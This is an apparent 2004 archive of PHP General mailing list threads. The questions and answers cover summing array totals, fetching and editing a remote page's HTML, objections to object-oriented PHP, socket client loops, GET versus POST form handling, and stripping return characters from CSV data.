link should only work for a set amount of time. I have ideas for
implementing something, but I have a hunch tat there is some code
already out there for this. Does anybody know of any? Thanks! 

Re: [PHP] array_merge_recursive

[Craig Slusher]

foreach ($animal_counts as $animal => $total) {
echo $animal. ':' .$total. '';
}


On Fri, 10 Dec 2004 13:51:36 -0500, Sebastian
<[EMAIL PROTECTED]> wrote:
> actually, what i mean is i need to get the animal name as well..
> 
> ie:
> echo $animal . ' : ' .  $total
> would output:
> 
>  : 
>  : 
> 
> etc. thanks.
> 
> 
> 
> - Original Message -
> From: "Sebastian" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Sent: Friday, December 10, 2004 12:24 PM
> Subject: [PHP] array_merge_recursive
> 
> > Hi.
> >
> > I am using this array_merge_recursive to merge two arrays, the array looks
> > like this:
> >
> > Array
> > (
> > [0] => Array
> > (
> > [animal] => Dogs
> > [total] => 5
> >
> > )
> >
> > [1] => Array
> > (
> > [animal] => Cats
> > [total] => 3
> > )
> >
> > [2] => Array
> > (
> > [animal] => Cats
> > [total] => 6
> > )
> >
> > )
> >
> > the output i need is:
> > Dogs 5
> > Cats 9
> >
> > I need to add the total but keep just one animal if its already there. can
> > someone please help? i been stuck for two days. i appreciate it.
> >
> > --
> > PHP General Mailing List (http://www.php.net/)
> > To unsubscribe, visit: http://www.php.net/unsub.php
> >
> >
> >
> 
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
> 
> 


-- 
Craig Slusher
Web Programmer
[EMAIL PROTECTED]

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] grabbing source of a URL

[Darren W]

What about using just the file command and then looping through the array?

I do this to scrape sites for content (pics, midi's, fonts) by getting the
links from within the html code and using the wwwcopy function in the php
docs.

I am sure there is a better way to do the pattern recognition but this works
for me. Perhaps someone can suggest a more streamlined method.

function getPicInfo($strSiteName, $strPartial)
{
if ($strSiteName != "")
{
$strURL = "http://".$strSiteName."/".$strPartial."/";;
$strMatch = "/gallery/";
$arrBase = file($strURL);
foreach ($arrBase as $intLine => $strVal)
{
$arrTemp = array();
$strLine = strtolower($strVal);
array_push($arrTemp, $strLine);
if (preg_grep($strMatch, $arrTemp))
{
// extract the href and do the copy here.
}
}
}
}

So this will look for the string "gallery" in the remote HTML file.
If you want to get everything between this and another match you could set a
flag that outputs the lines to an alternate array...

function getPicInfo($strSiteName, $strPartial)
{
$blnOutput = FALSE;
$arrOutput = array();
if ($strSiteName != "")
{
$strURL = "http://".$strSiteName."/".$strPartial."/";;
$strMatch = "/gallery/";
$strMatch = "/completed/";
$arrBase = file($strURL);
foreach ($arrBase as $intLine => $strVal)
{
$arrTemp = array();
$strLine = strtolower($strVal);
array_push($arrTemp, $strLine);
if (preg_grep($strMatch, $arrTemp))
{
// extract the href and do the copy here.
$blnOutPut = TRUE;
}
else if (preg_grep($strMatch2, $arrTemp))
{
// extract the href and do the copy here.
$blnOutPut = FALSE;
}
if ($blnOutput)
{
array_push($arrOutput, $strVal);
}
}
}
}

It's probably not very nice code, but it will do the job.

Can someone PLEASE help me with my encryption problems?!?!?!

Darren

"Warren Vail" <[EMAIL PROTECTED]> wrote in message
news:[EMAIL PROTECTED]
> Oops missed part of your question;
>
> > know what function to use to grab the page.  for the string
>
> http://us2.php.net/manual/en/function.fopen.php
>
> There are some good samples on the page
>
>$dh = fopen("$url",'r');
>$result = fread($dh,8192);
>
> Hope this is what you need.
>
> Warren Vail
>
>
> > -Original Message-
> > From: Adam Williams [mailto:[EMAIL PROTECTED]
> > Sent: Friday, December 10, 2004 9:56 AM
> > To: [EMAIL PROTECTED]
> > Subject: [PHP] grabbing source of a URL
> >
> >
> > Hi, I don't know what functions to use so maybe someone can
> > help me out.
> > I want to grab a URL's source (all the code from a link) and
> > then cut out
> > a block of text from it, throw it away, and then show the page.
> >
> > For example, if I have page.html with 3 lines:
> >
> > hi
> > 
> > 
> > this is line a
> > 
> > 
> > this is line b
> > 
> > 
> > this is line c
> > 
> > 
> >
> > i want my php script to grab the source of page.html, strip out:
> >
> > 
> > this is line a
> > 
> >
> > and then display what is left, how would I go about doing
> > this?  I don't
> > know what function to use to grab the page.  for the string
> > to remove, I
> > know I can probably do a str_replace and replace the known code with
> > nothing.
> >
> > --
> > PHP General Mailing List (http://www.php.net/)
> > To unsubscribe, visit: http://www.php.net/unsub.php
> >

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

RE: [PHP] Multiple Inheritance

[Justin Palmer]

I am sorry for you, Richard, for the vast miss-understanding of OO.

Regards,

Justin Palmer
__
KISS (Keep It Simple, SEARCH)!
Google::getUri( http://www.google.com );
Archives::getUri( http://marc.theaimsgroup.com/?l=php-general );



-Original Message-
From: Richard Lynch [mailto:[EMAIL PROTECTED] 
Sent: Friday, December 10, 2004 10:33 AM
To: Chris Boget
Cc: PHP General
Subject: Re: [PHP] Multiple Inheritance


> What are some of the things you guys do to get around the fact that
> classes in php4 can't do multiple inheritance?

What I do is not use classes.

At all.

:-)

As a Lisp programmer of over a decade, I think I can safely say I am an
OO proponent.

Yet, every time I sit down to program a web application in PHP, I find
very little (read: nothing) that I want to use OO *for*.

I'm not creating a whole bunch of anything, so the ability to make lots
of the same object never seems useful.

I'm not trying to solve an AI problem. :-)

I've already got simpler and more clear tools to write good code, such
as include and functions.

The overhead of OO is particularly ill-suited to a web environment where
run-times need to be in seconds or less.

I rarely have anything that wants to inheret a lot of behaviour from
something else, and then do something just a bit different.

I mostly just want to grab some data, massage it a bit, format it
nicely, and present it in HTML format.

To tell the truth, 95% of the "OO" code I run into written in PHP is
[bleep].

It seems like very very very little thought has gone into the Design of
the classes to be used -- Only the most straight-forward mapping of
everything under the sun into a class is utilized.

Inheritence is seldom used, even when it would be appropriate.

None of the power of OO is used.

OO seems to be used, badly, to separate chunks of code that would be
better served as simple straight-forward functions, include files, or
just plain old one-line PHP rather than 20 lines of a 'class' that does
nothing much.

I find myself digging through 5 files to un-wrap something that turns
out to be a whole lot of nothing when all is said and done.  Ugh!

How is that "Good Code"?!

I'm sure there must be some better PHP OO code out there.  Maybe that 1%
is worth all my pain trying to dig through the maundering mess most PHP
coders make of their application.

But to me, it feels like our profession has decided to force everybody
to use OO, no matter how inappropriate OO might be for the task at hand,
or how inexperienced the lead developer.

In a crude analogy, this would be like forcing every contruction company
to be their own architect, and to write their own blueprints.

OO code written by an inexperienced programmer usually ends up being
convoluted and buggy, rather than the clean, well-organized ideal it
strives for -- Worse, it seems TO ME that this code ends up being even
more convoluted and buggy than it would have been if the same
inexperienced programmer just wrote the code as straight-forward
procedural PHP with a few includes and functions.

*GOOD* OO code requires the experience and analysis of an expert to
build a sensible framework, leveraging the common behaviours and
properties of similar code -- or, more rarely but often more
spectacular, what seems like DIS-similar behaviours and properties that,
with a shift in view-point, turn out to be "the same"

Alas, what seems to be "de reguire" is for some beginner to sit down and
write the very first thing that comes into their mind as a 'class' and
just keep doing that over and over, but never actually *USING* OO for
its benefits.

I will probably be reviled as a heretic, but there it is.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

RE: [PHP] Multiple Inheritance

[Mike]

Richard,

Thank you for that.

I've been writing PHP apps for a while now but would not concider myself an
"expert". I just enjoy doing it and I know a fair bit about what I'm doing.
One thing I never quite got into (with PHP) is OO. Why - because nothing I
ever did really seemed to make sense as OO. I could easily write a function
that'd get called one or a few times and that was about it. There didn't
seem to be a need for objects to be used and re-used and my scripts
shouldn't ever run long enough for me to take advantage of OO's abilities.

I was worried that I "didn't get it" (and I still might not... But that's
another issue) but maybe I'm not too far off the mark. It's just useful to
see other people's opinions on this topic. 

Maybe I'll be burned at the stake along with you... ;)

-M


> > What are some of the things you guys do to get around the fact that 
> > classes in php4 can't do multiple inheritance?
> 
> What I do is not use classes.
> 
> At all.
> 
[snip] 
> I will probably be reviled as a heretic, but there it is.
> 

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

RE: [PHP] Multiple Inheritance

[Justin Palmer]

I am sorry for you Richard for the vast miss-understanding of OO.

Regards,

Justin Palmer
__
KISS (Keep It Simple, SEARCH)!
Google::getUri( http://www.google.com );
Archives::getUri( http://marc.theaimsgroup.com/?l=php-general );



-Original Message-
From: Richard Lynch [mailto:[EMAIL PROTECTED] 
Sent: Friday, December 10, 2004 10:33 AM
To: Chris Boget
Cc: PHP General
Subject: Re: [PHP] Multiple Inheritance


> What are some of the things you guys do to get around the fact that 
> classes in php4 can't do multiple inheritance?

What I do is not use classes.

At all.

:-)

As a Lisp programmer of over a decade, I think I can safely say I am an
OO proponent.

Yet, every time I sit down to program a web application in PHP, I find
very little (read: nothing) that I want to use OO *for*.

I'm not creating a whole bunch of anything, so the ability to make lots
of the same object never seems useful.

I'm not trying to solve an AI problem. :-)

I've already got simpler and more clear tools to write good code, such
as include and functions.

The overhead of OO is particularly ill-suited to a web environment where
run-times need to be in seconds or less.

I rarely have anything that wants to inheret a lot of behaviour from
something else, and then do something just a bit different.

I mostly just want to grab some data, massage it a bit, format it
nicely, and present it in HTML format.

To tell the truth, 95% of the "OO" code I run into written in PHP is
[bleep].

It seems like very very very little thought has gone into the Design of
the classes to be used -- Only the most straight-forward mapping of
everything under the sun into a class is utilized.

Inheritence is seldom used, even when it would be appropriate.

None of the power of OO is used.

OO seems to be used, badly, to separate chunks of code that would be
better served as simple straight-forward functions, include files, or
just plain old one-line PHP rather than 20 lines of a 'class' that does
nothing much.

I find myself digging through 5 files to un-wrap something that turns
out to be a whole lot of nothing when all is said and done.  Ugh!

How is that "Good Code"?!

I'm sure there must be some better PHP OO code out there.  Maybe that 1%
is worth all my pain trying to dig through the maundering mess most PHP
coders make of their application.

But to me, it feels like our profession has decided to force everybody
to use OO, no matter how inappropriate OO might be for the task at hand,
or how inexperienced the lead developer.

In a crude analogy, this would be like forcing every contruction company
to be their own architect, and to write their own blueprints.

OO code written by an inexperienced programmer usually ends up being
convoluted and buggy, rather than the clean, well-organized ideal it
strives for -- Worse, it seems TO ME that this code ends up being even
more convoluted and buggy than it would have been if the same
inexperienced programmer just wrote the code as straight-forward
procedural PHP with a few includes and functions.

*GOOD* OO code requires the experience and analysis of an expert to
build a sensible framework, leveraging the common behaviours and
properties of similar code -- or, more rarely but often more
spectacular, what seems like DIS-similar behaviours and properties that,
with a shift in view-point, turn out to be "the same"

Alas, what seems to be "de reguire" is for some beginner to sit down and
write the very first thing that comes into their mind as a 'class' and
just keep doing that over and over, but never actually *USING* OO for
its benefits.

I will probably be reviled as a heretic, but there it is.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] array_merge_recursive

[Sebastian]

actually, what i mean is i need to get the animal name as well..

ie:
echo $animal . ' : ' .  $total
would output:

 : 
 : 

etc. thanks.

- Original Message - 
From: "Sebastian" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Friday, December 10, 2004 12:24 PM
Subject: [PHP] array_merge_recursive


> Hi.
>
> I am using this array_merge_recursive to merge two arrays, the array looks
> like this:
>
> Array
> (
> [0] => Array
> (
> [animal] => Dogs
> [total] => 5
>
> )
>
> [1] => Array
> (
> [animal] => Cats
> [total] => 3
> )
>
> [2] => Array
> (
> [animal] => Cats
> [total] => 6
> )
>
> )
>
> the output i need is:
> Dogs 5
> Cats 9
>
> I need to add the total but keep just one animal if its already there. can
> someone please help? i been stuck for two days. i appreciate it.
>
> -- 
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>
>

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

RE: [PHP] grabbing source of a URL

[Vail, Warren]

Oops missed part of your question;

> know what function to use to grab the page.  for the string 

http://us2.php.net/manual/en/function.fopen.php

There are some good samples on the page

   $dh = fopen("$url",'r'); 
   $result = fread($dh,8192);

Hope this is what you need.

Warren Vail


> -Original Message-
> From: Adam Williams [mailto:[EMAIL PROTECTED] 
> Sent: Friday, December 10, 2004 9:56 AM
> To: [EMAIL PROTECTED]
> Subject: [PHP] grabbing source of a URL
> 
> 
> Hi, I don't know what functions to use so maybe someone can 
> help me out.  
> I want to grab a URL's source (all the code from a link) and 
> then cut out 
> a block of text from it, throw it away, and then show the page.
> 
> For example, if I have page.html with 3 lines:
> 
> hi
> 
> 
> this is line a
> 
> 
> this is line b
> 
> 
> this is line c
> 
> 
> 
> i want my php script to grab the source of page.html, strip out:
> 
> 
> this is line a
> 
> 
> and then display what is left, how would I go about doing 
> this?  I don't 
> know what function to use to grab the page.  for the string 
> to remove, I 
> know I can probably do a str_replace and replace the known code with 
> nothing.
> 
> -- 
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
> 

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

RE: [PHP] grabbing source of a URL

[Vail, Warren]

I suspect that you don't really want to cut out everything but the text
(since you plan to display it) but check out;

http://us2.php.net/manual/en/function.strip-tags.php

Now, keep in mind that since you are getting the source from the url, and
I'm guessing that the web server serving up the source will process php
files, this function will probably never see any php in that case, so when
you said "a URL's source" you must have meant "html source" generated by a
php program.

Warren Vail


> -Original Message-
> From: Adam Williams [mailto:[EMAIL PROTECTED] 
> Sent: Friday, December 10, 2004 9:56 AM
> To: [EMAIL PROTECTED]
> Subject: [PHP] grabbing source of a URL
> 
> 
> Hi, I don't know what functions to use so maybe someone can 
> help me out.  
> I want to grab a URL's source (all the code from a link) and 
> then cut out 
> a block of text from it, throw it away, and then show the page.
> 
> For example, if I have page.html with 3 lines:
> 
> hi
> 
> 
> this is line a
> 
> 
> this is line b
> 
> 
> this is line c
> 
> 
> 
> i want my php script to grab the source of page.html, strip out:
> 
> 
> this is line a
> 
> 
> and then display what is left, how would I go about doing 
> this?  I don't 
> know what function to use to grab the page.  for the string 
> to remove, I 
> know I can probably do a str_replace and replace the known code with 
> nothing.
> 
> -- 
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
> 

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] array_merge_recursive

[Sebastian]

Hi.

I am using this array_merge_recursive to merge two arrays, the array looks
like this:

Array
(
[0] => Array
(
[animal] => Dogs
[total] => 5

)

[1] => Array
(
[animal] => Cats
[total] => 3
)

[2] => Array
(
[animal] => Cats
[total] => 6
)

)

the output i need is:
Dogs 5
Cats 9

I need to add the total but keep just one animal if its already there. can
someone please help? i been stuck for two days. i appreciate it.

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] array_merge_recursive

[Richard Lynch]

Sebastian wrote:
> Hi.
>
> I am using this array_merge_recursive to merge two arrays, the array looks
> like this:
>
> Array
> (
> [0] => Array
> (
> [animal] => Dogs
> [total] => 5
>
> )
>
> [1] => Array
> (
> [animal] => Cats
> [total] => 3
> )
>
> [2] => Array
> (
> [animal] => Cats
> [total] => 6
> )
>
> )

$animals = array(array('animal'=>'Dogs', 'total'=>5),
array('animal'=>'Cats', 'total'=>3), array('animal'=>'Cats','total'=>6));

$animal_counts = array();
while (list(, $animal_total) = each($animals)){
  $animal = $animal_total['animal'];
  $total = $animal_total['total'];
  $animal_counts[$animal] += $total;
}

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] How to make a PHP Socket client crash-proof?

[René Fournier]

I managed to solve the problem with the socket client hanging when the 
Server "disappears".

Actually, it is not hanging. What I discovered is that once the other 
end of the connection drops, it starts/continues reading on that socket 
ad infinitum. (I put a little counter in it, and can watch it count 
up). What I did to stop detect a gone connection, and then restart the 
socket, isn't elegant, doesn't use a socket_select() or non-blocking, 
but it DOES work.

$i = 0;
while(($buf = socket_read($socket,1,PHP_BINARY_READ)) 
!== false) {
echo $i." >> \n";
$i++;
$data .= $buf;
if(preg_match("/EOF/",$data)) {
$msg_recv = 1;
break;
}
if($i>1) {
$connect = false;
break;
}   
}
Still, one day I would like to re-architect this. Seems a bit hackish.
...Rene
On 9-Dec-04, at 1:19 PM, Richard Lynch wrote:
Have you completely eliminated the possiblity of having a second,
independent, completely unrelated client/socket which is used to *SEND*
data to the server?
client_get <-- server
client_send ---> server
They can both use your local database to share data, to whatever degree
you deem necessary, but having one-way sockets for two different 
scripts
is way more easier than trying to get a two-way socket to work, in my
(limited) experience.

If you MUST push forward with a two-way socket, try to determine the 
state
of the world inside your infinite loop.  Why aren't you breaking out of
that loop?  Can you do *anything* to break out?

I suspect that once you have started SENDING data to the server, it's
going to just keep waiting for you to send more.  How do you signal the
end of your data to be sent?  Does the server understand that signal?
--
Like Music?
http://l-i-e.com/artists.htm


...René
---
René Fournier
www.renefournier.com
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Problems implementing encryption: mcrypt_cfb

[Darren W]

Hey, thanks for looking.

I would like to implement some sort of encryption to mask user id's.

I looked at the example on the PHP website:
http://au.php.net/manual/en/function.mcrypt-cfb.php

This is exactly what I need. It does not quite work as the top post in that
page suggests.

Can anyone suggest how to fix this problem (and perhaps also post it under
that section of the php function help) or suggest an alternate solution?

Any help would be appreciated,

Darren

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] grabbing source of a URL

[Adam Williams]

Hi, I don't know what functions to use so maybe someone can help me out.  
I want to grab a URL's source (all the code from a link) and then cut out 
a block of text from it, throw it away, and then show the page.

For example, if I have page.html with 3 lines:

hi


this is line a


this is line b


this is line c



i want my php script to grab the source of page.html, strip out:


this is line a


and then display what is left, how would I go about doing this?  I don't 
know what function to use to grab the page.  for the string to remove, I 
know I can probably do a str_replace and replace the known code with 
nothing.

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Question:maybe urldecode

[Jason Wong]

On Saturday 11 December 2004 00:19, Stuart Felenstein wrote:

>  > > $queryString = ($_SERVER['QUERY_STRING']);
> >
> > What is in $queryString after this? var_dump() it
> > and show us the result.
>
> This is the var_dump of the query string after I've
> made some selections in the page.
> string(80)
> "Ind%5B%5D=2&Ind%5B%5D=3&Ind%5B%5D=4&JTitle=Web&City=&Days=&Recs=15&Submit=
>Submit"

... so your form values are passed in the request URL, looks good.

> > Is it what you expect?  If not, what *did* you
> > expect?
>
> Yes, this is what I expect.
>
> > What is in $_POST before you start the next batch of
> > assignments? var_dump()
>
> Nothing is printing out on $_POST['var'] or $var
> s makes sense.

Now why are you looking in $_POST for your form values? They're in $_GET. You 
said earlier that you understood POST and GET?

> I hope this is clearer with more relevant information.

Yes, much better, concrete data and sequence of events are the kind of 
information what we need.

-- 
Jason Wong -> Gremlins Associates -> www.gremlins.biz
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *
--
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
--
/*
The devil can cite Scripture for his purpose.
  -- William Shakespeare, "The Merchant of Venice"
*/

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Question:maybe urldecode

[KJ]

Just want to double check that you're using the correct array in $_POST!
Are you using ? If not then you should be using 
$_GET, not $_POST.

$_SERVER['REQUEST_METHOD'] will have the method that you are using, 
remember to use the corresponding pre-defined variables.

KJ
Stuart Felenstein wrote:
--- "Ford, Mike" <[EMAIL PROTECTED]> wrote:
 

AARRGGHHH!  Vague, generalized, woolly!!
SHOW US the relevant bits of code.  SHOW US what you
get printed out,
especially anything that isn't what you expect, and
tell us exactly what you
did expect.

SPECIFICS, man, SPECIFICS!!
SHOW US the form -- we can't even begin to guess
what data your script will
see without knowing what the form says.  Preferably
tell us *exactly* what
each control on the form was set to when you
submitted it.

Each element takes the user input and passes it on to
the results page. What I also  want though it to put
the querystring back into the search page and have the
elements echo out the values chosen.
Let me demonstrate with one element:


'.$row['CareerCategories'].'';
} ?>
Now what I've added: $Ind = $_POST['Ind'];

$queryString = ($_SERVER['QUERY_STRING']);
What is in $queryString after this? var_dump() it
and show us the result.

This is the var_dump of the query string after I've
made some selections in the page.
string(80)
"Ind%5B%5D=2&Ind%5B%5D=3&Ind%5B%5D=4&JTitle=Web&City=&Days=&Recs=15&Submit=Submit"

Is it what you expect?  If not, what *did* you
expect?
Yes, this is what I expect.
 

What is in $_POST before you start the next batch of
assignments? var_dump()

Nothing is printing out on $_POST['var'] or $var
s makes sense.
I hope this is clearer with more relevant information.
Stuart 
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Multiple Inheritance

[Chris Boget]

What are some of the things you guys do to get around the
fact that classes in php4 can't do multiple inheritance?

thnx,
Chris

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Removing a return character

[John Nichel]

Greg Donald wrote:
On Fri, 10 Dec 2004 10:10:20 -, Shaun <[EMAIL PROTECTED]> wrote:
I have a system that scans through a CSV File and inserts each row into a
database. I have just noticed that some rows have a return character in
them - a small square - and this is causing errors in the mysql query.
Does anyone know how I can remove such chracters?

You can use one of the string replacement functions, eregi_replace()
for example.  If you're sure it's a return character then \r is what
you want to replace, or it might possibly be \r\n.

rtrim() will take care of all return characters at the end of the line, 
as well as white space.  The 'small square' could be something 
else...some special character.

--
John C. Nichel
ÜberGeek
KegWorks.com
716.856.9675
[EMAIL PROTECTED]
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Removing a return character

[tg-php]

All the suggestions made earlier make sense.  You could use a regular 
expression or a str_replace() if you knew what you were looking for.  And as 
someone mentioned, depending on your data set, you might want to use trim() (or 
the left or right variety thereof).

When dealing with a single line of data with "something funky" at the end, I'd 
usually end up using trim() because it removes white spaces, tabs, new lines, 
carriage returns, nulls and tabs from the string and that covers most of what I 
wouldn't want to be displaying or parsing in the projects I've worked on in the 
past.

If there's a chance that you will have any of those characters that you'd WANT 
to keep, then you can go with one of the other methods, or use the option 
parameters for trim() to tell it exactly what to trim.  Again, this will only 
remove items from the beginning and end of the string/line, not the middle.  So 
in some cases, this will be preferable to a str_replace() and simpler than 
using a regex (which could probably emulate trim() or any other replacement 
function... just need to know regex syntax. I think trim() is more intuitive 
for something this simple).

If you're still getting odd stuff, try going through your string and displaying 
the ord() of each character.  This will show you the ascii (decimal) value for 
that character.  If it's not a 32 (white space), 9 (tab), 10 (new line), 13 
(carriage return), 0 (null), or 11 (vertical tab apparently), then you could 
use str_replace or use trim() with it's optional parameters to remove the 
offending character.

See the documentation for trim() here for more info:
http://us2.php.net/manual/en/function.trim.php

Good luck!

-TG

= = = Original message = = =

Hi,

I have a system that scans through a CSV File and inserts each row into a 
database. I have just noticed that some rows have a return character in 
them - a small square - and this is causing errors in the mysql query.

Does anyone know how I can remove such chracters?


___
Sent by ePrompter, the premier email notification software.
Free download at http://www.ePrompter.com.

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php